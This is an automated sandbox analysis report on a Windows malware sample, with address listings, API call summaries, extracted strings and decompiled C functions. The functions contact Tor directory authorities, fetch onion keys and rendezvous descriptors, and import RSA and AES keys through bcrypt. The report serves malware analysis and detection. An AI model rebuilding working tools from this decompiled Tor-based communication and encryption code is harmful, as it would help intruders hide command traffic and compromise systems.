                        0x004022a6
                        0x004022a6
                        0x004022a6
                        0x00000000
                        0x004022a6
                        0x0040226c
                        0x00402271
                        0x00402273
                        0x00000000
                        0x00000000
                        0x00402279
                        0x0040227f
                        0x00000000
                        0x00000000
                        0x00402281
                        0x00402287
                        0x00000000
                        0x00000000
                        0x0040228d
                        0x00402296
                        0x0040229b
                        0x0040229d
                        0x0040229d
                        0x0040229d
                        0x00000000
                        0x0040229d
                        0x004022af
                        0x00000000
                        0x00402199
                        0x004022f7
                        0x004022f7
                        0x004022f7
                        0x004022f7
                        0x00000000
                        0x00402304
                        0x00401522
                        0x00401525
                        0x00401528
                        0x0040153b
                        0x0040153b
                        0x0040153f
                        0x00000000
                        0x00000000
                        0x00401532
                        0x00401533
                        0x00401535
                        0x00401537
                        0x00401537
                        0x00401538
                        0x00401538
                        0x00401538
                        0x00401538
                        0x00401541
                        0x00401558
                        0x00401567
                        0x0040156c
                        0x0040156e
                        0x00000000
                        0x00000000
                        0x0040158c
                        0x00401591
                        0x00401597
                        0x0040164d
                        0x0040164d
                        0x00401650
                        0x00000000
                        0x00000000
                        0x00401652
                        0x00401656
                        0x004015ac
                        0x004015ac
                        0x004015ae
                        0x00000000
                        0x00000000
                        0x004015b4
                        0x004015c4
                        0x004015c9
                        0x004015cb
                        0x00000000
                        0x00000000
                        0x004015d1
                        0x004015e1
                        0x004015e6
                        0x004015e8
                        0x00000000
                        0x00000000
                        0x004015ee
                        0x004015fe
                        0x00401603
                        0x00401605
                        0x00000000
                        0x00000000
                        0x0040160c
                        0x0040160e
                        0x00401610
                        0x0040161c
                        0x00401621
                        0x00401623
                        0x00000000
                        0x00000000
                        0x0040162c
                        0x0040163c
                        0x00401641
                        0x00401643
                        0x00000000
                        0x00000000
                        0x00401649
                        0x0040164c
                        0x0040164c
                        0x00000000
                        0x0040164c
                        0x00000000
                        0x00401656
                        0x00401c17
                        0x00401c17
                        0x00401c1a
                        0x00000000
                        0x00000000
                        0x00401661
                        0x004016c4
                        0x004016c9
                        0x004016cb
                        0x00401bfd
                        0x00401c0f
                        0x00401c14
                        0x00401c14
                        0x00401c14
                        0x00000000
                        0x00401c14
                        0x004016f2
                        0x004016f7
                        0x004016f8
                        0x004016fa
                        0x00401701
                        0x00401707
                        0x0040170c
                        0x00401718
                        0x0040171d
                        0x00401723
                        0x0040173d
                        0x0040175b
                        0x0040177a
                        0x0040177f
                        0x00401781
                        0x00000000
                        0x00000000
                        0x00401787
                        0x0040178d
                        0x004017a3
                        0x004017a8
                        0x004017af
                        0x004017b6
                        0x004017bf
                        0x004017c9
                        0x004017d3
                        0x00401803
                        0x00401808
                        0x00401809
                        0x00401817
                        0x0040181c
                        0x00401834
                        0x00401840
                        0x00401846
                        0x00401850
                        0x00401850
                        0x00401850
                        0x00401852
                        0x00000000
                        0x00000000
                        0x0040184a
                        0x0040184b
                        0x0040184d
                        0x0040184f
                        0x0040184f
                        0x0040184d
                        0x00401854
                        0x0040186c
                        0x0040188b
                        0x00401890
                        0x004018a3
                        0x004018ab
                        0x004018b2
                        0x004018b3
                        0x004018b5
                        0x004018c0
                        0x004018c1
                        0x004018c3
                        0x004018c5
                        0x004018ca
                        0x004018d4
                        0x004018de
                        0x004018e8
                        0x004018f2
                        0x004018fc
                        0x0040190c
                        0x0040190e
                        0x00401927
                        0x0040192c
                        0x0040192e
                        0x00401939
                        0x00401940
                        0x00401947
                        0x00401948
                        0x0040194a
                        0x00401962
                        0x0040196f
                        0x00401974
                        0x0040197a
                        0x00401980
                        0x00401983
                        0x00401987
                        0x00401990
                        0x00401993
                        0x004019ad
                        0x004019b8
                        0x004019be
                        0x004019c8
                        0x004019d2
                        0x004019d7
                        0x004019d8
                        0x004019e0
                        0x004019e1
                        0x004019e3
                        0x004019eb
                        0x004019ec
                        0x004019f4
                        0x004019f5
                        0x00401a10
                        0x00401a1d
                        0x00401a22
                        0x00401a2c
                        0x00401a36
                        0x00401a50
                        0x00401a55
                        0x00401a57
                        0x00401a5f
                        0x00401a60
                        0x00401a62
                        0x00401a6a
                        0x00401a71
                        0x00401a72
                        0x00401a74
                        0x00401a8c
                        0x00401aa1
                        0x00401aba
                        0x00401aca
                        0x00401aec
                        0x00401b07
                        0x00401b22
                        0x00401b27
                        0x00401b2d
                        0x00401b2f
                        0x00000000
                        0x00000000
                        0x00401b35
                        0x00401b39
                        0x00000000
                        0x00000000
                        0x00401b5c
                        0x00401b61
                        0x00401b63
                        0x00000000
                        0x00000000
                        0x00401b69
                        0x00401b6d
                        0x00000000
                        0x00000000
                        0x00401b93
                        0x00401b98
                        0x00401b9a
                        0x00000000
                        0x00000000
                        0x00401bb3
                        0x00401beb
                        0x00401bf0
                        0x00401bf2
                        0x00000000
                        0x00000000
                        0x00401bf8
                        0x00000000
                        0x00401bf8
                        0x00401c20
                        0x00401c22
                        0x00000000
                        0x00000000
                        0x00401c33
                        0x00401c38
                        0x00401c3e
                        0x00401c41
                        0x00401c45
                        0x00401c49
                        0x00401c50
                        0x00401c53
                        0x00401c65
                        0x00401c77
                        0x00401c7c
                        0x00401c8e
                        0x00401c9f
                        0x00401cae
                        0x00401cd4
                        0x00401cef
                        0x00401d0a
                        0x00401d0f
                        0x00401d15
                        0x00401d17
                        0x00000000
                        0x00000000
                        0x00401d1d
                        0x00401d21
                        0x00000000
                        0x00000000
                        0x00401d48
                        0x00401d4d
                        0x00401d4f
                        0x00000000
                        0x00000000
                        0x00401d55
                        0x00401d59
                        0x00401d68
                        0x00401d7c
                        0x00401d8e
                        0x00401d9f
                        0x00401dad
                        0x00401db2
                        0x00401db2
                        0x00000000
                        0x00401d59
                        0x004014f3
                        0x004014fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004014fa
                        0x004014ad
                        0x004014b0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004014b0
                        0x0040149b
                        0x0040149e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040149e
                        0x00401489
                        0x0040148c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040148c
                        0x00401477
                        0x0040147a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040147a
                        0x00000000
                        0x00401439
                        0x00000000
                        0x00401439
                        0x00401437
                        0x004013c2
                        0x004026a7
                        0x004026a7
                        0x004026ae
                        0x004026b5
                        0x004026b7
                        0x004026b7
                        0x004026ca
                        0x004026cf
                        0x004026d6
                        0x004026dd
                        0x004026e4
                        0x004026e6
                        0x004026ed
                        0x004026ed
                        0x00402701
                        0x0040270b
                        0x00402710
                        0x00402717
                        0x00402719
                        0x0040271b
                        0x00402733
                        0x00402733
                        0x00402735
                        0x00402737
                        0x0040274f
                        0x00402751
                        0x00402753
                        0x0040276b
                        0x00402779
                        0x00402785
                        0x00402791
                        0x0040279d
                        0x004027a9
                        0x004027b8

                        APIs
                        • CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider,0000000D,F0000000,?,?,00408566,?,00000003), ref: 004011E6
                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,00000000,?), ref: 0040270B
                          • Part of subcall function 00402A45: wsprintfA.USER32 ref: 00402A94
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00401558
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040158C
                        • inet_addr.WSOCK32(?,00000100,?,00000400,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401707
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040173D
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040175B
                          • Part of subcall function 00403DE9: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00403EE2
                          • Part of subcall function 00403DE9: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00403F00
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040186C
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040188B
                        • CryptDecodeObject.CRYPT32(00000001,00000013,?,0000008C,00000000,?,?), ref: 004018C5
                          • Part of subcall function 00404554: select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,?,00000000,?,?,00408566,?,00000003), ref: 00404591
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: Crypt$BinaryString$Context$AcquireDecodeObjectReleaseinet_addrselectwsprintf
                        • String ID: -----BEGIN MESSAGE-----$-----END$-----END MESSAGE-----$/tor/status-vote/current/consensus$128.31.0.34$128.31.0.39$131.188.40.189$154.35.175.225$171.25.193.9$193.23.244.244$194.109.206.212$199.58.81.140$204.13.164.118$86.59.21.38$AES$BCryptCloseAlgorithmProvider$BCryptEncrypt$BCryptImportKey$BCryptImportKeyPair$BCryptOpenAlgorithmProvider$BCryptSetProperty$ChainingMode$ChainingModeECB$GET /tor/rendezvous2/%s HTTP/1.0Host: %sConnection: close$KDBM$KEY-----$KeyDataBlob$Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider$P$P$P$P$P$P$P$RSA$RSAPUBLICBLOB$SHA1$bcrypt.dll$directory-footer$introduction-point$ip-address$onion-port$service-key
                        • API String ID: 1114855807-1473801416
                        • Opcode ID: 6e82316541f79fb6ff0ad979b33c91711a3f354ce3701add97e9ec13b285dd14
                        • Instruction ID: 41d08dab3cc7980140572954f0b0bb5926a0dd7d15b285d7bfdccc1a5b9af0f2
                        • Opcode Fuzzy Hash: 6e82316541f79fb6ff0ad979b33c91711a3f354ce3701add97e9ec13b285dd14
                        • Instruction Fuzzy Hash: A9D29071D40219AEDF219B90CD45FEEB779AF44304F0040EAF608B61D1DB7AAAA4CF59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 008617A8
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 008617DC
                        • inet_addr.WS2_32(?), ref: 00861957
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0086198D
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 008619AB
                          • Part of subcall function 00864039: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00864150
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00861ABC
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00861ADB
                        • CryptDecodeObject.CRYPT32(00000001,00000013,?,0000008C,00000000,?,?), ref: 00861B15
                          • Part of subcall function 008647A4: select.WS2_32(00000000,?,00000000,00000000,?), ref: 008647E1
                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,00000000,?), ref: 0086295B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$BinaryString$ContextDecodeObjectReleaseinet_addrselect
                        • String ID: AES$ChainingMode$ChainingModeECB$KDBM$KeyDataBlob$P$P$P$P$P$P$P$RSA$RSAPUBLICBLOB$SHA1
                        • API String ID: 1993778655-2997045072
                        • Opcode ID: edb7c15d712722c0f1151b9f6b153cef0f49d34c0a751fea1b3039de2f80a0b7
                        • Instruction ID: cb22fbef989826293486fbe5304670be1c692532a495c14652594a40b239e9c8
                        • Opcode Fuzzy Hash: edb7c15d712722c0f1151b9f6b153cef0f49d34c0a751fea1b3039de2f80a0b7
                        • Instruction Fuzzy Hash: EBD28C71D40259AAEF219B90CC45FEEBB79FB08300F1140E5F608F6091DB76AAA4DF56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 43%
                        			E004038DA(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                        				char _v16;
                        				char _v516;
                        				char _v568;
                        				intOrPtr _v572;
                        				int _v576;
                        				int _v580;
                        				intOrPtr _v584;
                        				intOrPtr _v588;
                        				intOrPtr _v592;
                        				char _v596;
                        				char _v597;
                        				intOrPtr _v728;
                        				char _v732;
                        				intOrPtr _v736;
                        				int _v740;
                        				char _v744;
                        				char _v884;
                        				char _v942;
                        				char _v1012;
                        				char _v1028;
                        				int _v1032;
                        				char _v1040;
                        				char _v1044;
                        				int _v1052;
                        				int _v1056;
                        				char* _v1060;
                        				void* _t72;
                        				void* _t126;
                        				void* _t129;
                        				void* _t130;
                        
                        				_t130 = __eflags;
                        				E00406259( &_v1060,  &_v16 - _t129);
                        				if(E00406492(_t130, _a12) == 0x20) {
                        					_v1032 = E004063E2(_a12,  &_v516);
                        				} else {
                        					CryptStringToBinaryA(_a12, 0, 1, 0,  &_v1032, 0, 0);
                        					CryptStringToBinaryA(_a12, 0, 1,  &_v516,  &_v1032, 0, 0);
                        				}
                        				_t132 = _a36 - 1;
                        				if(_a36 == 1) {
                        					_t123 = _a32;
                        					E004061D2( &_v516, _a32 + 0xba, _v1032);
                        				}
                        				_t72 = E00403DE9(_t123, _t132, _a4, _a8,  &_v516,  &_v884);
                        				if(_t72 != 0) {
                        					_t72 = E00403BB4(_a20, _a16,  &_v1012);
                        					_t134 = _t72;
                        					if(_t72 != 0) {
                        						E004065B9(_t72, 0x100);
                        						asm("stosb");
                        						asm("loop 0xfffffff5");
                        						_v1044 = 0x94;
                        						_push( &_v1044);
                        						_push( &_v744);
                        						_push(0);
                        						_push(0x8c);
                        						_push( &_v884);
                        						_push(0x13);
                        						_push(1);
                        						L00406AB4();
                        						_v596 = 0x31415352;
                        						_v592 = 0x400;
                        						_v588 = 4;
                        						_v584 = 0x80;
                        						_v580 = 0;
                        						_v576 = 0;
                        						asm("bswap eax");
                        						_v572 = _v728;
                        						E0040618C( &_v597,  &_v568, 0x80);
                        						_push(0);
                        						_push(0x9c);
                        						_push( &_v596);
                        						_push( &_v1040);
                        						_push(L"RSAPUBLICBLOB");
                        						_push(0);
                        						_push(_a24);
                        						 *((intOrPtr*)(E00406788(_t134, E00406698("bcrypt.dll"), "BCryptImportKeyPair")))();
                        						_v1060 = L"SHA1";
                        						_v1056 = 0;
                        						_v1052 = 0;
                        						_push(4);
                        						_push( &_v1044);
                        						_push(0x80);
                        						_push(_a32);
                        						_push(0);
                        						_push(0);
                        						_push( &_v1060);
                        						_push(0x56);
                        						_push( &_v1028);
                        						_push(_v1040);
                        						 *((intOrPtr*)(E00406788(_t134, E00406698("bcrypt.dll"), "BCryptEncrypt")))();
                        						E0040605D( &_v1040,  &_v1040, 0, 1);
                        						_t126 = _a32 + _v1044;
                        						_v744 = 0x4d42444b;
                        						_v740 = 1;
                        						_v736 = 0x10;
                        						E004061D2( &_v1028,  &_v732, 0x10);
                        						_push(0);
                        						_push(0x1c);
                        						_push( &_v744);
                        						_push(0);
                        						_push(0);
                        						_push( &_v1040);
                        						_push(L"KeyDataBlob");
                        						_push(0);
                        						_push(_a28);
                        						 *((intOrPtr*)(E00406788(_t134, E00406698("bcrypt.dll"), "BCryptImportKey")))();
                        						E004061D2( &_v942, _t126, 0x3a);
                        						E00403554(_t134, _v1040, _t126, 0x3a, 0);
                        						E0040605D( &_v1040,  &_v1040, 0, 1);
                        						return _t126 + 0x3a - _a32;
                        					}
                        				}
                        				return _t72;
                        			}

































                        0x004038da
                        0x004038f1
                        0x00403901
                        0x0040394b
                        0x00403903
                        0x00403917
                        0x00403935
                        0x00403935
                        0x00403951
                        0x00403955
                        0x00403957
                        0x0040396e
                        0x0040396e
                        0x00403987
                        0x0040398e
                        0x004039a1
                        0x004039a6
                        0x004039a8
                        0x004039be
                        0x004039c3
                        0x004039c4
                        0x004039c6
                        0x004039d6
                        0x004039dd
                        0x004039de
                        0x004039e0
                        0x004039eb
                        0x004039ec
                        0x004039ee
                        0x004039f0
                        0x004039f5
                        0x004039ff
                        0x00403a09
                        0x00403a13
                        0x00403a1d
                        0x00403a27
                        0x00403a37
                        0x00403a39
                        0x00403a52
                        0x00403a57
                        0x00403a59
                        0x00403a64
                        0x00403a6b
                        0x00403a72
                        0x00403a73
                        0x00403a75
                        0x00403a8d
                        0x00403a95
                        0x00403a9b
                        0x00403aa5
                        0x00403ab2
                        0x00403aba
                        0x00403abb
                        0x00403ac0
                        0x00403ac3
                        0x00403ac5
                        0x00403acd
                        0x00403ace
                        0x00403ad6
                        0x00403ad7
                        0x00403af2
                        0x00403aff
                        0x00403b04
                        0x00403b0a
                        0x00403b14
                        0x00403b1e
                        0x00403b38
                        0x00403b3d
                        0x00403b3f
                        0x00403b47
                        0x00403b48
                        0x00403b4a
                        0x00403b52
                        0x00403b59
                        0x00403b5a
                        0x00403b5c
                        0x00403b74
                        0x00403b80
                        0x00403b90
                        0x00403ba6
                        0x00000000
                        0x00403bab
                        0x004039a8
                        0x00403bb1

                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00403917
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00403935
                        • CryptDecodeObject.CRYPT32(00000001,00000013,?,0000008C,00000000,?,?), ref: 004039F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: Crypt$BinaryString$DecodeObject
                        • String ID: BCryptEncrypt$BCryptImportKey$BCryptImportKeyPair$KDBM$KeyDataBlob$RSA1$RSAPUBLICBLOB$SHA1$bcrypt.dll
                        • API String ID: 698452922-2403945854
                        • Opcode ID: 30a88e46c5f050edb9c4a3c58b67cd00741da112eedfe72f4c197f97542bf5a3
                        • Instruction ID: bb62f679b5c11add256c0736dff7da7bd6f018e1014224f773612ac08a290859
                        • Opcode Fuzzy Hash: 30a88e46c5f050edb9c4a3c58b67cd00741da112eedfe72f4c197f97542bf5a3
                        • Instruction Fuzzy Hash: 90712FB194021CAAEB20EF91CC46FDA777CAB44704F0005EAB709B60C1D7B5AB948F69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,00405B8B,00405CA9,00000000,00000000), ref: 0086127B
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000,00000000,00405B8B,00405CA9,00000000,00000000,?,?,70207369), ref: 0086128E
                          • Part of subcall function 00865FB8: LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00866014
                          • Part of subcall function 00865FB8: LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086601E
                          • Part of subcall function 00865FB8: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 00866035
                          • Part of subcall function 00865FB8: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 00866045
                          • Part of subcall function 00865FB8: LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086605D
                          • Part of subcall function 00865FB8: CloseHandle.KERNEL32(?,?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008), ref: 00866065
                        • OpenMutexA.KERNEL32(00100000,00000000,llfujo), ref: 00861340
                        • CreateMutexA.KERNEL32(00000000,00000000,llfujo,00100000,00000000,llfujo,00408129,00000000,?,00000100,00000000,00000000,00405B8B,00405CA9,00000000,00000000), ref: 00861354
                        • EnumWindows.USER32(0040593C,00000000), ref: 0086137B
                        • Sleep.KERNEL32(00002710,0040593C,00000000,00002710,0040593C,00000000), ref: 00861385
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000100,0040811D,00002710,0040593C,00000000,00002710,0040593C,00000000), ref: 008613B2
                        • CopyFileA.KERNEL32(?,?,00000000), ref: 008613D8
                        • Sleep.KERNEL32(0000EA60,0040811D,00002710,0040593C,00000000,00002710,0040593C,00000000), ref: 008613FE
                        • ExitProcess.KERNEL32(00000000,0000EA60,0040811D,00002710,0040593C,00000000,00002710,0040593C,00000000), ref: 00866ADD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileLocal$CreateFreeModuleMutexNameSleep$AllocAuthorityCloseCopyEnumExitHandleInformationOpenProcessThreadTokenWindows
                        • String ID: llfujo
                        • API String ID: 3825064006-2623408462
                        • Opcode ID: da48f3c4b8f3bb883ace523001b2dd1afccee13f5d8bf6fcda1a97818a6831e3
                        • Instruction ID: 003c2c77f399adabd1d3a4233642bf4d283195a988e00b834c2fc12f3069cfd9
                        • Opcode Fuzzy Hash: da48f3c4b8f3bb883ace523001b2dd1afccee13f5d8bf6fcda1a97818a6831e3
                        • Instruction Fuzzy Hash: 4D418770A80348BAEF30E794CD47F987268FF04B15F164465B744FA2C2EAF456858A5A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00863B67
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00863B85
                        • CryptDecodeObject.CRYPT32(00000001,00000013,?,0000008C,00000000,?,?), ref: 00863C40
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$BinaryString$DecodeObject
                        • String ID: KDBM$KeyDataBlob$RSA1$RSAPUBLICBLOB$SHA1
                        • API String ID: 698452922-1412799199
                        • Opcode ID: 18c5be94ccef0cba62b59a392cc173b1c118f2c6b6c663211872200f4ef1164c
                        • Instruction ID: 3079e65210e39f47aa88cf2d75b64f0e084bc6f3a58e3eb4e5da429aa49c8458
                        • Opcode Fuzzy Hash: 18c5be94ccef0cba62b59a392cc173b1c118f2c6b6c663211872200f4ef1164c
                        • Instruction Fuzzy Hash: 8F712CB294025CAAEB20DF94CC86FDA777CFB44704F1105A6B708F60C1DBB5AA948F59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E00403DE9(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, BYTE* _a16) {
                        				char _v16;
                        				char _v501;
                        				char _v516;
                        				char _v520;
                        				intOrPtr _v524;
                        				int _v532;
                        				intOrPtr _t35;
                        				void* _t39;
                        				void* _t40;
                        				void* _t41;
                        				char* _t43;
                        				char _t53;
                        				void* _t54;
                        				char* _t56;
                        				void* _t59;
                        				void* _t60;
                        
                        				_t60 = __eflags;
                        				E00406259( &_v532,  &_v16 - _t59);
                        				E004061D2("/tor/server/fp/",  &_v516, 0xf);
                        				E004065EA(_a12, 0x14,  &_v501);
                        				_t35 = E00402A45(__edx, _t60, _a4, _a8,  &_v516,  &_v520);
                        				_t61 = _t35;
                        				if(_t35 != 0) {
                        					_t53 = _v520;
                        					_v524 = _t35;
                        					_t39 = E00406561(_t61, _t53, _v524, "onion-key");
                        					_t62 = _t39;
                        					if(_t39 != 0) {
                        						_t40 = _t39 - _t53;
                        						_t54 = _t53 + _t40;
                        						_v524 = _v524 - _t40;
                        						_t41 = E00406561(_t62, _t54, _v524, "-----BEGIN RSA PUBLIC KEY-----");
                        						_t63 = _t41;
                        						if(_t41 != 0) {
                        							_t42 = _t41 - _t54;
                        							_v524 = _v524 - _t41 - _t54;
                        							_t43 = E00406561(_t63, _t54 + _t42, _v524, "-----END");
                        							if(_t43 != 0) {
                        								_t56 =  &_v516;
                        								 *_t43 = 0;
                        								while(1) {
                        									asm("lodsb");
                        									if(_t43 > 0x20) {
                        										asm("stosb");
                        									}
                        									if(_t43 == 0) {
                        										break;
                        									}
                        								}
                        								 *_t56 = 0;
                        								CryptStringToBinaryA( &_v516, 0, 1, 0,  &_v532, 0, 0);
                        								CryptStringToBinaryA( &_v516, 0, 1, _a16,  &_v532, 0, 0);
                        							}
                        						}
                        					}
                        				}
                        				E00404681( &_v520);
                        				return _v532;
                        			}



















                        0x00403de9
                        0x00403e00
                        0x00403e13
                        0x00403e24
                        0x00403e3d
                        0x00403e42
                        0x00403e44
                        0x00403e4a
                        0x00403e50
                        0x00403e62
                        0x00403e67
                        0x00403e69
                        0x00403e6f
                        0x00403e71
                        0x00403e73
                        0x00403e85
                        0x00403e8a
                        0x00403e8c
                        0x00403e8e
                        0x00403e92
                        0x00403ea4
                        0x00403eab
                        0x00403eb2
                        0x00403eb8
                        0x00403ebb
                        0x00403ebb
                        0x00403ebe
                        0x00403ec0
                        0x00403ec0
                        0x00403ec3
                        0x00000000
                        0x00000000
                        0x00403ec5
                        0x00403ec7
                        0x00403ee2
                        0x00403f00
                        0x00403f00
                        0x00403eab
                        0x00403e8c
                        0x00403e69
                        0x00403f0c
                        0x00403f1b

                        APIs
                          • Part of subcall function 00402A45: wsprintfA.USER32 ref: 00402A94
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00403EE2
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00403F00
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: BinaryCryptString$wsprintf
                        • String ID: -----BEGIN RSA PUBLIC KEY-----$-----END$/tor/server/fp/$onion-key
                        • API String ID: 2962846386-2989486038
                        • Opcode ID: f4165d4c170c6d4e9428747cdf0b0da8e271c0f524917755f37f749a58f2d512
                        • Instruction ID: 075114a9c79a63e1ae3d01ca0205731f2ada0a5f93bea76052c87a082f6def9e
                        • Opcode Fuzzy Hash: f4165d4c170c6d4e9428747cdf0b0da8e271c0f524917755f37f749a58f2d512
                        • Instruction Fuzzy Hash: 3731E632A403197ADB20DA65CC46FEF777DAB44304F0500BABA15F21C2DB749A908F69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E00401DC1() {
                        				signed int _t587;
                        				signed int _t617;
                        				signed int _t619;
                        				signed int _t623;
                        				int _t625;
                        				signed int _t631;
                        				signed int _t638;
                        				intOrPtr _t643;
                        				signed int _t649;
                        				char _t650;
                        				signed int _t657;
                        				signed int _t684;
                        				signed int _t689;
                        				signed int _t709;
                        				signed int _t711;
                        				int _t717;
                        				signed int _t718;
                        				signed int _t726;
                        				signed int _t729;
                        				signed int _t733;
                        				signed int _t734;
                        				signed int _t739;
                        				intOrPtr _t747;
                        				void* _t749;
                        				signed int _t753;
                        				signed int _t761;
                        				signed int _t780;
                        				signed int _t782;
                        				intOrPtr _t797;
                        				char _t798;
                        				signed int _t806;
                        				signed int _t818;
                        				signed int _t876;
                        				signed int _t878;
                        				signed int _t880;
                        				signed int _t890;
                        				signed int _t892;
                        				signed int _t893;
                        				signed int _t894;
                        				signed int _t895;
                        				void* _t897;
                        				signed int _t898;
                        				signed int _t900;
                        				void* _t903;
                        				signed int _t904;
                        				int _t907;
                        				signed int _t912;
                        				signed int _t916;
                        				char _t920;
                        				void* _t923;
                        				char* _t929;
                        				void* _t937;
                        				char* _t939;
                        				char* _t940;
                        				char* _t941;
                        				char* _t942;
                        				char* _t943;
                        				intOrPtr _t944;
                        				char* _t945;
                        				BYTE* _t946;
                        				char* _t947;
                        				char* _t948;
                        				char* _t952;
                        				char* _t953;
                        				char* _t954;
                        				void* _t956;
                        				char* _t957;
                        				intOrPtr _t960;
                        				void* _t961;
                        				void* _t963;
                        
                        				while(1) {
                        					L116:
                        					 *(_t961 - 0x6a8) =  *(_t961 - 0x6a8) + 1;
                        					L118:
                        					while( *(_t961 - 0x6a8) <= 4) {
                        						_t935 = E00403CE1( *((intOrPtr*)(_t961 - 0x23c)), E004065B9(_t580,  *((intOrPtr*)(_t961 - 0x6a0))), 0);
                        						_t580 = E00403D29(_t582);
                        						__eflags =  *(_t961 - 0x6a8);
                        						if( *(_t961 - 0x6a8) != 0) {
                        							L3:
                        							__eflags =  *(_t961 - 0x6a8) - 1;
                        							if( *(_t961 - 0x6a8) != 1) {
                        								L5:
                        								__eflags =  *(_t961 - 0x6a8) - 2;
